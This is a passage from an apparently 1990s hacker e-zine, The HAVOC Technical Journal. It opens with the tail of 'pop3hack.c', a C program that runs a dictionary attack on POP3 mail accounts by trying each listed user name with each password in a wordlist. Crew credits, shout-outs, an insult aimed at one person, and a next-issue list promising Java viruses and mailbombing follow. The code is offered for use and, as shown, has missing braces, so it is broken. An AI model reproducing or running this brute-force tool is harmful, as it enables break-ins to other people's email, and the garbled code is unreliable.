  1659.         *in='\0'; 
  1660.         return buff; 
  1661.      } 
  1662.      else 
  1663.      { 
  1664.         *in=(char)ch; 
  1665.         in++; 
  1666.      } 
  1667.    } 
  1668.  
  1669.       
  1670. void swallow_welcome(void) 
  1671.    char b[100];   
  1672.    popfp=fdopen(popfd, "rt");       
  1673.    getanswer(b); 
  1674.  
  1675.  
  1676. void hackity_hack(void) 
  1677.    char *un; 
  1678.    char *pw; 
  1679.    char *c; 
  1680.    int found=0; 
  1681.     
  1682.    un=(char *)malloc(512); 
  1683.    pw=(char *)malloc(512); 
  1684.    if(un==NULL || pw==NULL) return; 
  1685.     
  1686.    userfile=fopen(user, "rt"); 
  1687.    dictfile=fopen(dict, "rt"); 
  1688.    if(userfile == NULL || dictfile == NULL) return; 
  1689.     
  1690.    for(;;) 
  1691.    { 
  1692.      while(fgets(un, 50, userfile) != NULL) 
  1693.      { 
  1694.         found=0; 
  1695.         c=strchr(un, 10); 
  1696.         if(c != NULL) *c=0; 
  1697.         
  1698.         c=strchr(un, 13); 
  1699.         if(c != NULL) *c=0; 
  1700.         
  1701.         while(fgets(pw, 50, dictfile) != NULL && found==0) 
  1702.         { 
  1703.           c=strchr(pw, 10); 
  1704.           if(c != NULL) *c=0; 
  1705.            
  1706.           c=strchr(pw, 13); 
  1707.           if(c != NULL) *c=0; 
  1708.            
  1709.           if(strlen(pw) > 2 && strlen(un) > 2) 
  1710.             if(pop_guess(un, pw)==0) 
  1711.             { 
  1712.                found=1; 
  1713.                fclose(popfp); 
  1714.                close(popfd); 
  1715.                if(RECONNECT==0) 
  1716.                { 
  1717.                  free(pw); 
  1718.                  free(un); 
  1719.                  fclose(userfile); 
  1720.                  fclose(dictfile); 
  1721.                  exit(0); 
  1722.                } 
  1723.                pop_connect(host); 
  1724.                swallow_welcome();                
  1725.             }                            
  1726.         } 
  1727.         fclose(dictfile); 
  1728.         dictfile=fopen(dict, "rt"); 
  1729.      } 
  1730.      fclose(dictfile); 
  1731.      fclose(userfile); 
  1732.      free(un); 
  1733.      free(pw); 
  1734.      exit(0); 
  1735.    } 
  1736.  
  1737. -- pop3hack.c -- 
  1738.  
  1739. Next Month: Real Hacking
  1740.  
  1741. ___________________________________________________________________
  1742. HBS
  1743.  
  1744. Who is HAVOC Bell Systems?
  1745.        Scud-O       : Linux Lammah
  1746.        psych0       : All Around Lammah
  1747.        Keystroke    : Mad PLA Insider (issue 9 submissions editor)
  1748.        REality      : the Digital Man
  1749.        UnaBomber    : (busted again?)
  1750.        memor        : the MAN in France
  1751.        Agrajag      : yet another MAD PLA insider!
  1752.        Digital_X    : the rewt 0f A11 3\/i1!
  1753.        theLURK3R    : almost g0dlike
  1754.        Redtyde      : a demigod
  1755.        darkcyde     : The brother from another planet!
  1756.        disc0re      : The pain in AT&T's arse  (issue 9 distributer)
  1757.        KungFuFox    : The Guest Editor for issue 9!
  1758.  
  1759. -----------
  1760. * |\|\cFill and SanchoPanza have been taken off, since mainly they are MIA
  1761.  
  1762. Cool Undernet Channels:
  1763.        #phreak, #hackers, #corrupt
  1764.  
  1765. Cool People:
  1766.  
  1767.        ArcAngl   : the OTHER BellAtlantic phreak
  1768.        darc      : The MAN          
  1769.        Jisa      : she looks just like Scully.. I Swear!
  1770.        ec|ipse   : I'm coming to your house to kill you fool!
  1771.        zeth      : the cellular 'GOD'
  1772.        phire     : liked the SSI article in hacknowledge issue 2!
  1773.        dr1x      : showed our lame asses how to start up confs
  1774.        tombin    : thanks fer the account! - wtf did you do to it?
  1775.        CiND3R    : you ever REALLY there anymore?
  1776.        hrdluk    : thanks for connecting me and REality                
  1777.        yesimlame : are you ever really on anymore?
  1778.        digipimp  : where the hell is yer article?
  1779.        btm       : you are god
  1780.        WeatherM  : pan1k's right hand man
  1781.        Demonweed : welcome back
  1782.        BC219     : da other #phreak chick
  1783.        Defraz    : future hoster of evilempire.org( until co-location)
  1784.        trixert   : (aka trix-ahoy) same        
  1785.        Po0f      : #corrupt / CorrupT creator
  1786.        Cool mofos: Setuidrwt, iCBM, CraKerJaK, AnTiFiRe
  1787.  
  1788. Lammah(s) of the Month:
  1789.         _Kinst_ : BITCH!
  1790.  
  1791. -------------------------------------------------------------------
  1792. This Month Question(s):  Why is Kung going to edit issue 9?
  1793.  
  1794.        Because not only does he kick major arse monkeys, he agreed to do it.
  1795. But Kung isnt the only one on the new THTJ editorial staff. both Keystroke and
  1796. disc0re have prominent roles in next issues release. So send them some e-mails
  1797. tellin em to make the issue better than the rest so Scud-O doesnt come back!
  1798.  
  1799. keystroke@thepentagon.com | ender@multigames.com | don't mail disc0re
  1800.  
  1801.   Next Month's Question: For KungFuFox to decide....
  1802.  
  1803. -------------------------------------------------------------------
  1804. Next Month:
  1805.        This MAY be what we will have in issue 9
  1806.         - Java Virues Pt. I
  1807.         - MAPI Mailbombing and other funky ass shit
  1808.         - TAPI - overview, dos source, win95 source(?)
  1809.         - ICMP - overview
  1810.         - TFTP Weaknesses
  1811.         - More from the RTFM
  1812.         - Much, Much more TBA!
  1813.              Issue 9 is out April 1st!
  1814.  
  1815.  Send all articles for issue 9 to: keystroke@thepentagon.com
  1816.  
  1817.  Cya next issue! - The leet mofo's at THTJ 
  1818.  
  1819.         ==========================================================
  1820.         = Is this copy of The HAVOC Technical Journal Skunked?   =
  1821.         = If this file doesn't read at 67879 bytes, it probably  = 
  1822.         = doesn't have a born on date! Get a fresh copy from our = 
  1823.         = site at: http://www.geocities.com/SiliconValley/8805/  =
  1824.         ==========================================================
  1825.